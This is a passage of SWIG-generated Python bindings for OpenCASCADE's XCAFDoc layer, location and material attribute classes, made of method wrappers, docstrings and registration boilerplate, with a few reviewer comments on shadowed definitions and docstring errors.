class XCAFDoc_LayerTool(OCC.TDF.TDF_Attribute):
    """Attribute managing the layer table of an XDE document (shape<->layer links)."""
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        """
        :rtype: None
        """
        _XCAFDoc.XCAFDoc_LayerTool_swiginit(self,_XCAFDoc.new_XCAFDoc_LayerTool(*args))
    # Placeholder def, rebound below via staticmethod() (SWIG-generated pattern).
    def Set(*args):
        """
        * Creates (if not exist) LayerTool.
        :param L:
        :type L: TDF_Label &
        :rtype: Handle_XCAFDoc_LayerTool
        """
        return _XCAFDoc.XCAFDoc_LayerTool_Set(*args)
    Set = staticmethod(Set)
    def GetID(*args):
        """
        :rtype: Standard_GUID
        """
        return _XCAFDoc.XCAFDoc_LayerTool_GetID(*args)
    GetID = staticmethod(GetID)
    def BaseLabel(self, *args):
        """
        * returns the label under which Layers are stored
        :rtype: TDF_Label
        """
        return _XCAFDoc.XCAFDoc_LayerTool_BaseLabel(self, *args)
    def ShapeTool(self, *args):
        """
        * Returns internal XCAFDoc_ShapeTool tool
        :rtype: Handle_XCAFDoc_ShapeTool
        """
        return _XCAFDoc.XCAFDoc_LayerTool_ShapeTool(self, *args)
    def IsLayer(self, *args):
        """
        * Returns True if label belongs to a Layertable and is a Layer definition
        :param lab:
        :type lab: TDF_Label &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_LayerTool_IsLayer(self, *args)
    def GetLayer(self, *args):
        """
        * Returns the Layer defined by label lab. Returns False if the label is not in the Layertable or does not define a Layer
        :param lab:
        :type lab: TDF_Label &
        :param aLayer:
        :type aLayer: TCollection_ExtendedString &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_LayerTool_GetLayer(self, *args)
    def FindLayer(self, *args):
        """
        * Finds a Layer definition in the Layertable and returns its label if found. Returns False if the Layer is not found in the Layertable
        :param aLayer:
        :type aLayer: TCollection_ExtendedString &
        :param lab:
        :type lab: TDF_Label &
        :rtype: bool
        * Finds a Layer definition in the Layertable and returns its label if found (or a Null label otherwise)
        :param aLayer:
        :type aLayer: TCollection_ExtendedString &
        :rtype: TDF_Label
        """
        return _XCAFDoc.XCAFDoc_LayerTool_FindLayer(self, *args)
    def AddLayer(self, *args):
        """
        * Adds a Layer definition to the Layertable and returns its label (returns the existing label if the same Layer is already defined)
        :param aLayer:
        :type aLayer: TCollection_ExtendedString &
        :rtype: TDF_Label
        """
        return _XCAFDoc.XCAFDoc_LayerTool_AddLayer(self, *args)
    def RemoveLayer(self, *args):
        """
        * Removes Layer from the Layertable
        :param lab:
        :type lab: TDF_Label &
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_LayerTool_RemoveLayer(self, *args)
    def GetLayerLabels(self, *args):
        """
        * Returns a sequence of Layers currently stored in the Layertable
        :param Labels:
        :type Labels: TDF_LabelSequence &
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_LayerTool_GetLayerLabels(self, *args)
    def GetShapesOfLayer(self, *args):
        """
        * Returns in <ShLabels> the sequence of shape labels assigned to the given layer.
        :param layerL:
        :type layerL: TDF_Label &
        :param ShLabels:
        :type ShLabels: TDF_LabelSequence &
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_LayerTool_GetShapesOfLayer(self, *args)
    def IsVisible(self, *args):
        """
        * Return True if layer is visible, False if invisible.
        :param layerL:
        :type layerL: TDF_Label &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_LayerTool_IsVisible(self, *args)
    def SetVisibility(self, *args):
        """
        * Set the visibility of a layer. If the layer is invisible, a UAttribute with the corresponding GUID is set on its label.
        :param layerL:
        :type layerL: TDF_Label &
        :param isvisible: default value is Standard_True
        :type isvisible: bool
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_LayerTool_SetVisibility(self, *args)
    def SetLayer(self, *args):
        """
        * Sets a link from label <L> to the Layer defined by <LayerL>. The optional parameter <shapeInOneLayer> controls whether the shape may belong to several layers or only to one.
        :param L:
        :type L: TDF_Label &
        :param LayerL:
        :type LayerL: TDF_Label &
        :param shapeInOneLayer: default value is Standard_False
        :type shapeInOneLayer: bool
        :rtype: None
        * Sets a link from label <L> to Layer <aLayer> in the Layertable, adding the Layer as necessary. The optional parameter <shapeInOneLayer> controls whether the shape may belong to several layers or only to one.
        :param L:
        :type L: TDF_Label &
        :param aLayer:
        :type aLayer: TCollection_ExtendedString &
        :param shapeInOneLayer: default value is Standard_False
        :type shapeInOneLayer: bool
        :rtype: None
        * Sets a link from the label containing shape <Sh> to the layer situated at label <LayerL>. The optional parameter <shapeInOneLayer> controls whether the shape may belong to several layers or only to one. Returns False if there is no such shape <Sh> or label <LayerL>
        :param Sh:
        :type Sh: TopoDS_Shape &
        :param LayerL:
        :type LayerL: TDF_Label &
        :param shapeInOneLayer: default value is Standard_False
        :type shapeInOneLayer: bool
        :rtype: bool
        * Sets a link from the label containing shape <Sh> to layer <aLayer>, adding <aLayer> to the LayerTable if necessary. The optional parameter <shapeInOneLayer> controls whether the shape may belong to several layers or only to one. Returns False if there is no such shape <Sh>.
        :param Sh:
        :type Sh: TopoDS_Shape &
        :param aLayer:
        :type aLayer: TCollection_ExtendedString &
        :param shapeInOneLayer: default value is Standard_False
        :type shapeInOneLayer: bool
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_LayerTool_SetLayer(self, *args)
    def UnSetLayers(self, *args):
        """
        * Removes a link from label <L> to all layers
        :param L:
        :type L: TDF_Label &
        :rtype: None
        * Remove links between shape <Sh> and all Layers in the LayerTable. Returns False if there is no such shape <Sh> in the XCAF Document.
        :param Sh:
        :type Sh: TopoDS_Shape &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_LayerTool_UnSetLayers(self, *args)
    def UnSetOneLayer(self, *args):
        """
        * Remove the link between label <L> and Layer <aLayer>. Returns False if there is no such layer.
        :param L:
        :type L: TDF_Label &
        :param aLayer:
        :type aLayer: TCollection_ExtendedString &
        :rtype: bool
        * Remove the link between label <L> and Layer <aLayerL>. Returns False if <aLayerL> is not a layer label.
        :param L:
        :type L: TDF_Label &
        :param aLayerL:
        :type aLayerL: TDF_Label &
        :rtype: bool
        * Remove the link between shape <Sh> and layer <aLayer>. Returns False if there is no such layer <aLayer> or shape <Sh>.
        :param Sh:
        :type Sh: TopoDS_Shape &
        :param aLayer:
        :type aLayer: TCollection_ExtendedString &
        :rtype: bool
        * Remove the link between shape <Sh> and layer <aLayerL>. Returns False if there is no such layer <aLayerL> or shape <Sh>.
        :param Sh:
        :type Sh: TopoDS_Shape &
        :param aLayerL:
        :type aLayerL: TDF_Label &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_LayerTool_UnSetOneLayer(self, *args)
    def IsSet(self, *args):
        """
        * Returns True if label <L> has a Layer associated with the <aLayer>.
        :param L:
        :type L: TDF_Label &
        :param aLayer:
        :type aLayer: TCollection_ExtendedString &
        :rtype: bool
        * Returns True if label <L> has a Layer associated with the <aLayerL> label.
        :param L:
        :type L: TDF_Label &
        :param aLayerL:
        :type aLayerL: TDF_Label &
        :rtype: bool
        * Returns True if shape <Sh> has a Layer associated with the <aLayer>.
        :param Sh:
        :type Sh: TopoDS_Shape &
        :param aLayer:
        :type aLayer: TCollection_ExtendedString &
        :rtype: bool
        * Returns True if shape <Sh> has a Layer associated with the <aLayerL>.
        :param Sh:
        :type Sh: TopoDS_Shape &
        :param aLayerL:
        :type aLayerL: TDF_Label &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_LayerTool_IsSet(self, *args)
    def GetLayers(self, *args):
        """
        * Return the sequence of strings <aLayerS> associated with label <L>.
        :param L:
        :type L: TDF_Label &
        :param aLayerS:
        :type aLayerS: Handle_TColStd_HSequenceOfExtendedString &
        :rtype: bool
        * Return the sequence of labels <aLayerLS> associated with label <L>.
        :param L:
        :type L: TDF_Label &
        :param aLayerLS:
        :type aLayerLS: TDF_LabelSequence &
        :rtype: bool
        * Return the sequence of strings associated with label <L>.
        :param L:
        :type L: TDF_Label &
        :rtype: Handle_TColStd_HSequenceOfExtendedString
        * Return the sequence of strings <aLayerS> associated with shape <Sh>.
        :param Sh:
        :type Sh: TopoDS_Shape &
        :param aLayerS:
        :type aLayerS: Handle_TColStd_HSequenceOfExtendedString &
        :rtype: bool
        * Return the sequence of labels <aLayerLS> associated with shape <Sh>.
        :param Sh:
        :type Sh: TopoDS_Shape &
        :param aLayerLS:
        :type aLayerLS: TDF_LabelSequence &
        :rtype: bool
        * Return the sequence of strings associated with shape <Sh>.
        :param Sh:
        :type Sh: TopoDS_Shape &
        :rtype: Handle_TColStd_HSequenceOfExtendedString
        """
        return _XCAFDoc.XCAFDoc_LayerTool_GetLayers(self, *args)
    # SWIG/pythonOCC internal helper (see _kill_pointed on sibling classes).
    def _kill_pointed(self):
        """_kill_pointed(XCAFDoc_LayerTool self)"""
        return _XCAFDoc.XCAFDoc_LayerTool__kill_pointed(self)
    def GetHandle(self):
        """GetHandle(XCAFDoc_LayerTool self) -> Handle_XCAFDoc_LayerTool"""
        return _XCAFDoc.XCAFDoc_LayerTool_GetHandle(self)
    def __del__(self):
        # Best-effort cleanup; bare except is deliberate (interpreter shutdown).
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except:
            pass
# SWIG runtime wiring: rebind placeholder methods to C-level instance
# methods, then register the proxy type with the extension module.
XCAFDoc_LayerTool.BaseLabel = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_BaseLabel,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.ShapeTool = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_ShapeTool,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.IsLayer = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_IsLayer,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.GetLayer = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_GetLayer,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.FindLayer = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_FindLayer,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.AddLayer = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_AddLayer,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.RemoveLayer = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_RemoveLayer,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.GetLayerLabels = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_GetLayerLabels,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.GetShapesOfLayer = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_GetShapesOfLayer,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.IsVisible = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_IsVisible,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.SetVisibility = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_SetVisibility,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.SetLayer = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_SetLayer,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.UnSetLayers = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_UnSetLayers,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.UnSetOneLayer = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_UnSetOneLayer,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.IsSet = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_IsSet,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.GetLayers = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_GetLayers,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool__kill_pointed,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_GetHandle,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool_swigregister = _XCAFDoc.XCAFDoc_LayerTool_swigregister
XCAFDoc_LayerTool_swigregister(XCAFDoc_LayerTool)
# Module-level alias of the static method XCAFDoc_LayerTool.Set.
def XCAFDoc_LayerTool_Set(*args):
    """
    * Creates (if not exist) LayerTool.
    :param L:
    :type L: TDF_Label &
    :rtype: Handle_XCAFDoc_LayerTool
    """
    return _XCAFDoc.XCAFDoc_LayerTool_Set(*args)
# Module-level alias of the static method XCAFDoc_LayerTool.GetID.
def XCAFDoc_LayerTool_GetID(*args):
    """
    :rtype: Standard_GUID
    """
    return _XCAFDoc.XCAFDoc_LayerTool_GetID(*args)
class Handle_XCAFDoc_LayerTool(OCC.TDF.Handle_TDF_Attribute):
    """OCCT handle (reference-counted smart pointer) to XCAFDoc_LayerTool."""
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        _XCAFDoc.Handle_XCAFDoc_LayerTool_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_LayerTool(*args))
    DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_LayerTool_DownCast)
    def __del__(self):
        # Best-effort cleanup; bare except is deliberate (interpreter shutdown).
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except:
            pass
# SWIG runtime wiring for the handle class, then type registration.
Handle_XCAFDoc_LayerTool.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_LayerTool_Nullify,None,Handle_XCAFDoc_LayerTool)
Handle_XCAFDoc_LayerTool.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_LayerTool_IsNull,None,Handle_XCAFDoc_LayerTool)
Handle_XCAFDoc_LayerTool.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_LayerTool_GetObject,None,Handle_XCAFDoc_LayerTool)
Handle_XCAFDoc_LayerTool._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_LayerTool__kill_pointed,None,Handle_XCAFDoc_LayerTool)
Handle_XCAFDoc_LayerTool_swigregister = _XCAFDoc.Handle_XCAFDoc_LayerTool_swigregister
Handle_XCAFDoc_LayerTool_swigregister(Handle_XCAFDoc_LayerTool)
# NOTE: the Python wrapper def below is immediately shadowed by the direct
# C binding on the following line; both are emitted by SWIG as generated.
def Handle_XCAFDoc_LayerTool_DownCast(*args):
    return _XCAFDoc.Handle_XCAFDoc_LayerTool_DownCast(*args)
Handle_XCAFDoc_LayerTool_DownCast = _XCAFDoc.Handle_XCAFDoc_LayerTool_DownCast
class XCAFDoc_Location(OCC.TDF.TDF_Attribute):
    """OCAF attribute that stores a TopLoc_Location on a TDF label (SWIG proxy)."""
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        """
        * class methods =============
        :rtype: None
        """
        _XCAFDoc.XCAFDoc_Location_swiginit(self,_XCAFDoc.new_XCAFDoc_Location(*args))
    def GetID(*args):
        """
        :rtype: Standard_GUID
        """
        return _XCAFDoc.XCAFDoc_Location_GetID(*args)
    GetID = staticmethod(GetID)
    def Set(self, *args):
        """
        * Find, or create, a Location attribute and set its value; the Location attribute is returned. Location methods ===============
        :param label:
        :type label: TDF_Label &
        :param Loc:
        :type Loc: TopLoc_Location &
        :rtype: Handle_XCAFDoc_Location
        :param Loc:
        :type Loc: TopLoc_Location &
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_Location_Set(self, *args)
    def Get(self, *args):
        """
        * Returns the stored location.
        NOTE(review): the extracted header comment read 'Returns True if there
        is a reference on the same label', which contradicts the declared
        :rtype below — confirm against the OCCT headers.
        :rtype: TopLoc_Location
        """
        return _XCAFDoc.XCAFDoc_Location_Get(self, *args)
    def _kill_pointed(self):
        """_kill_pointed(XCAFDoc_Location self)"""
        return _XCAFDoc.XCAFDoc_Location__kill_pointed(self)
    def GetHandle(self):
        """GetHandle(XCAFDoc_Location self) -> Handle_XCAFDoc_Location"""
        return _XCAFDoc.XCAFDoc_Location_GetHandle(self)
    def __del__(self):
        # Narrowed from a bare ``except:``; shutdown-time failures are still
        # deliberately ignored.
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except Exception:
            pass
# SWIG boilerplate: bind the flat C wrappers as methods and register the proxy.
XCAFDoc_Location.Set = new_instancemethod(_XCAFDoc.XCAFDoc_Location_Set,None,XCAFDoc_Location)
XCAFDoc_Location.Get = new_instancemethod(_XCAFDoc.XCAFDoc_Location_Get,None,XCAFDoc_Location)
XCAFDoc_Location._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_Location__kill_pointed,None,XCAFDoc_Location)
XCAFDoc_Location.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_Location_GetHandle,None,XCAFDoc_Location)
XCAFDoc_Location_swigregister = _XCAFDoc.XCAFDoc_Location_swigregister
XCAFDoc_Location_swigregister(XCAFDoc_Location)
def XCAFDoc_Location_GetID(*args):
    """Return the GUID that identifies the Location attribute.

    :rtype: Standard_GUID
    """
    # Module-level alias for the static C++ method; delegate to the C wrapper.
    guid = _XCAFDoc.XCAFDoc_Location_GetID(*args)
    return guid
class Handle_XCAFDoc_Location(OCC.TDF.Handle_TDF_Attribute):
    """SWIG proxy for the OCCT smart pointer ``Handle_XCAFDoc_Location``."""
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        """Wrap a new C++ handle; arguments are forwarded to the SWIG constructor."""
        _XCAFDoc.Handle_XCAFDoc_Location_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_Location(*args))
    DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_Location_DownCast)
    def __del__(self):
        # Narrowed from a bare ``except:``; shutdown-time failures are still
        # deliberately ignored.
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except Exception:
            pass
# SWIG boilerplate: bind handle operations to the proxy and register it.
Handle_XCAFDoc_Location.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Location_Nullify,None,Handle_XCAFDoc_Location)
Handle_XCAFDoc_Location.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Location_IsNull,None,Handle_XCAFDoc_Location)
Handle_XCAFDoc_Location.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Location_GetObject,None,Handle_XCAFDoc_Location)
Handle_XCAFDoc_Location._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Location__kill_pointed,None,Handle_XCAFDoc_Location)
Handle_XCAFDoc_Location_swigregister = _XCAFDoc.Handle_XCAFDoc_Location_swigregister
Handle_XCAFDoc_Location_swigregister(Handle_XCAFDoc_Location)
def Handle_XCAFDoc_Location_DownCast(*args):
    # NOTE(review): this def is immediately shadowed by the rebinding on the
    # next line; kept exactly as emitted by SWIG.
    return _XCAFDoc.Handle_XCAFDoc_Location_DownCast(*args)
Handle_XCAFDoc_Location_DownCast = _XCAFDoc.Handle_XCAFDoc_Location_DownCast
class XCAFDoc_Material(OCC.TDF.TDF_Attribute):
    """OCAF attribute describing a material (name, description, density) — SWIG proxy."""
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        """
        :rtype: None
        """
        _XCAFDoc.XCAFDoc_Material_swiginit(self,_XCAFDoc.new_XCAFDoc_Material(*args))
    def GetID(*args):
        """
        :rtype: Standard_GUID
        """
        return _XCAFDoc.XCAFDoc_Material_GetID(*args)
    GetID = staticmethod(GetID)
    def Set(self, *args):
        """
        :param label:
        :type label: TDF_Label &
        :param aName:
        :type aName: Handle_TCollection_HAsciiString &
        :param aDescription:
        :type aDescription: Handle_TCollection_HAsciiString &
        :param aDensity:
        :type aDensity: float
        :param aDensName:
        :type aDensName: Handle_TCollection_HAsciiString &
        :param aDensValType:
        :type aDensValType: Handle_TCollection_HAsciiString &
        :rtype: Handle_XCAFDoc_Material
        :param aName:
        :type aName: Handle_TCollection_HAsciiString &
        :param aDescription:
        :type aDescription: Handle_TCollection_HAsciiString &
        :param aDensity:
        :type aDensity: float
        :param aDensName:
        :type aDensName: Handle_TCollection_HAsciiString &
        :param aDensValType:
        :type aDensValType: Handle_TCollection_HAsciiString &
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_Material_Set(self, *args)
    def GetName(self, *args):
        """
        :rtype: Handle_TCollection_HAsciiString
        """
        return _XCAFDoc.XCAFDoc_Material_GetName(self, *args)
    def GetDescription(self, *args):
        """
        :rtype: Handle_TCollection_HAsciiString
        """
        return _XCAFDoc.XCAFDoc_Material_GetDescription(self, *args)
    def GetDensity(self, *args):
        """
        :rtype: float
        """
        return _XCAFDoc.XCAFDoc_Material_GetDensity(self, *args)
    def GetDensName(self, *args):
        """
        :rtype: Handle_TCollection_HAsciiString
        """
        return _XCAFDoc.XCAFDoc_Material_GetDensName(self, *args)
    def GetDensValType(self, *args):
        """
        :rtype: Handle_TCollection_HAsciiString
        """
        return _XCAFDoc.XCAFDoc_Material_GetDensValType(self, *args)
    def _kill_pointed(self):
        """_kill_pointed(XCAFDoc_Material self)"""
        return _XCAFDoc.XCAFDoc_Material__kill_pointed(self)
    def GetHandle(self):
        """GetHandle(XCAFDoc_Material self) -> Handle_XCAFDoc_Material"""
        return _XCAFDoc.XCAFDoc_Material_GetHandle(self)
    def __del__(self):
        # Narrowed from a bare ``except:``; shutdown-time failures are still
        # deliberately ignored.
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except Exception:
            pass
# SWIG boilerplate: bind the flat C wrappers as methods and register the proxy.
XCAFDoc_Material.Set = new_instancemethod(_XCAFDoc.XCAFDoc_Material_Set,None,XCAFDoc_Material)
XCAFDoc_Material.GetName = new_instancemethod(_XCAFDoc.XCAFDoc_Material_GetName,None,XCAFDoc_Material)
XCAFDoc_Material.GetDescription = new_instancemethod(_XCAFDoc.XCAFDoc_Material_GetDescription,None,XCAFDoc_Material)
XCAFDoc_Material.GetDensity = new_instancemethod(_XCAFDoc.XCAFDoc_Material_GetDensity,None,XCAFDoc_Material)
XCAFDoc_Material.GetDensName = new_instancemethod(_XCAFDoc.XCAFDoc_Material_GetDensName,None,XCAFDoc_Material)
XCAFDoc_Material.GetDensValType = new_instancemethod(_XCAFDoc.XCAFDoc_Material_GetDensValType,None,XCAFDoc_Material)
XCAFDoc_Material._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_Material__kill_pointed,None,XCAFDoc_Material)
XCAFDoc_Material.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_Material_GetHandle,None,XCAFDoc_Material)
XCAFDoc_Material_swigregister = _XCAFDoc.XCAFDoc_Material_swigregister
XCAFDoc_Material_swigregister(XCAFDoc_Material)
def XCAFDoc_Material_GetID(*args):
    """Return the GUID that identifies the Material attribute.

    :rtype: Standard_GUID
    """
    # Module-level alias for the static C++ method; delegate to the C wrapper.
    guid = _XCAFDoc.XCAFDoc_Material_GetID(*args)
    return guid
class Handle_XCAFDoc_Material(OCC.TDF.Handle_TDF_Attribute):
    """SWIG proxy for the OCCT smart pointer ``Handle_XCAFDoc_Material``."""
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        """Wrap a new C++ handle; arguments are forwarded to the SWIG constructor."""
        _XCAFDoc.Handle_XCAFDoc_Material_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_Material(*args))
    DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_Material_DownCast)
    def __del__(self):
        # Narrowed from a bare ``except:``; shutdown-time failures are still
        # deliberately ignored.
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except Exception:
            pass
# SWIG boilerplate: bind handle operations to the proxy and register it.
Handle_XCAFDoc_Material.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Material_Nullify,None,Handle_XCAFDoc_Material)
Handle_XCAFDoc_Material.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Material_IsNull,None,Handle_XCAFDoc_Material)
Handle_XCAFDoc_Material.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Material_GetObject,None,Handle_XCAFDoc_Material)
Handle_XCAFDoc_Material._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Material__kill_pointed,None,Handle_XCAFDoc_Material)
Handle_XCAFDoc_Material_swigregister = _XCAFDoc.Handle_XCAFDoc_Material_swigregister
Handle_XCAFDoc_Material_swigregister(Handle_XCAFDoc_Material)
def Handle_XCAFDoc_Material_DownCast(*args):
    # NOTE(review): this def is immediately shadowed by the rebinding on the
    # next line; kept exactly as emitted by SWIG.
    return _XCAFDoc.Handle_XCAFDoc_Material_DownCast(*args)
Handle_XCAFDoc_Material_DownCast = _XCAFDoc.Handle_XCAFDoc_Material_DownCast
class XCAFDoc_MaterialTool(OCC.TDF.TDF_Attribute):
    """Tool attribute managing the material table of an XCAF document — SWIG proxy."""
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        """
        :rtype: None
        """
        _XCAFDoc.XCAFDoc_MaterialTool_swiginit(self,_XCAFDoc.new_XCAFDoc_MaterialTool(*args))
    def Set(*args):
        """
        * Creates (if not exist) MaterialTool.
        :param L:
        :type L: TDF_Label &
        :rtype: Handle_XCAFDoc_MaterialTool
        """
        return _XCAFDoc.XCAFDoc_MaterialTool_Set(*args)
    Set = staticmethod(Set)
    def GetID(*args):
        """
        :rtype: Standard_GUID
        """
        return _XCAFDoc.XCAFDoc_MaterialTool_GetID(*args)
    GetID = staticmethod(GetID)
    def BaseLabel(self, *args):
        """
        * returns the label under which colors are stored
        NOTE(review): 'colors' is likely a copy-paste from the OCCT ColorTool
        header; for MaterialTool this is presumably the materials table label
        — confirm against the OCCT documentation.
        :rtype: TDF_Label
        """
        return _XCAFDoc.XCAFDoc_MaterialTool_BaseLabel(self, *args)
    def ShapeTool(self, *args):
        """
        * Returns internal XCAFDoc_ShapeTool tool
        :rtype: Handle_XCAFDoc_ShapeTool
        """
        return _XCAFDoc.XCAFDoc_MaterialTool_ShapeTool(self, *args)
    def IsMaterial(self, *args):
        """
        * Returns True if label belongs to a material table and is a Material definition
        :param lab:
        :type lab: TDF_Label &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_MaterialTool_IsMaterial(self, *args)
    def GetMaterialLabels(self, *args):
        """
        * Returns a sequence of materials currently stored in the material table
        :param Labels:
        :type Labels: TDF_LabelSequence &
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_MaterialTool_GetMaterialLabels(self, *args)
    def AddMaterial(self, *args):
        """
        * Adds a Material definition to a table and returns its label
        :param aName:
        :type aName: Handle_TCollection_HAsciiString &
        :param aDescription:
        :type aDescription: Handle_TCollection_HAsciiString &
        :param aDensity:
        :type aDensity: float
        :param aDensName:
        :type aDensName: Handle_TCollection_HAsciiString &
        :param aDensValType:
        :type aDensValType: Handle_TCollection_HAsciiString &
        :rtype: TDF_Label
        """
        return _XCAFDoc.XCAFDoc_MaterialTool_AddMaterial(self, *args)
    def SetMaterial(self, *args):
        """
        * Sets a link with GUID
        :param L:
        :type L: TDF_Label &
        :param MatL:
        :type MatL: TDF_Label &
        :rtype: None
        * Sets a link with GUID Adds a Material as necessary
        :param L:
        :type L: TDF_Label &
        :param aName:
        :type aName: Handle_TCollection_HAsciiString &
        :param aDescription:
        :type aDescription: Handle_TCollection_HAsciiString &
        :param aDensity:
        :type aDensity: float
        :param aDensName:
        :type aDensName: Handle_TCollection_HAsciiString &
        :param aDensValType:
        :type aDensValType: Handle_TCollection_HAsciiString &
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_MaterialTool_SetMaterial(self, *args)
    def GetMaterial(self, *args):
        """
        * Returns Material assigned to <MatL> Returns False if no such Material is assigned
        :param MatL:
        :type MatL: TDF_Label &
        :param aName:
        :type aName: Handle_TCollection_HAsciiString &
        :param aDescription:
        :type aDescription: Handle_TCollection_HAsciiString &
        :param aDensity:
        :type aDensity: float &
        :param aDensName:
        :type aDensName: Handle_TCollection_HAsciiString &
        :param aDensValType:
        :type aDensValType: Handle_TCollection_HAsciiString &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_MaterialTool_GetMaterial(self, *args)
    def GetDensityForShape(*args):
        """
        * Find referred material and return density from it if no material --> return 0
        :param ShapeL:
        :type ShapeL: TDF_Label &
        :rtype: float
        """
        return _XCAFDoc.XCAFDoc_MaterialTool_GetDensityForShape(*args)
    GetDensityForShape = staticmethod(GetDensityForShape)
    def _kill_pointed(self):
        """_kill_pointed(XCAFDoc_MaterialTool self)"""
        return _XCAFDoc.XCAFDoc_MaterialTool__kill_pointed(self)
    def GetHandle(self):
        """GetHandle(XCAFDoc_MaterialTool self) -> Handle_XCAFDoc_MaterialTool"""
        return _XCAFDoc.XCAFDoc_MaterialTool_GetHandle(self)
    def __del__(self):
        # Narrowed from a bare ``except:``; shutdown-time failures are still
        # deliberately ignored.
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except Exception:
            pass
# SWIG boilerplate: bind the flat C wrappers as methods and register the proxy.
XCAFDoc_MaterialTool.BaseLabel = new_instancemethod(_XCAFDoc.XCAFDoc_MaterialTool_BaseLabel,None,XCAFDoc_MaterialTool)
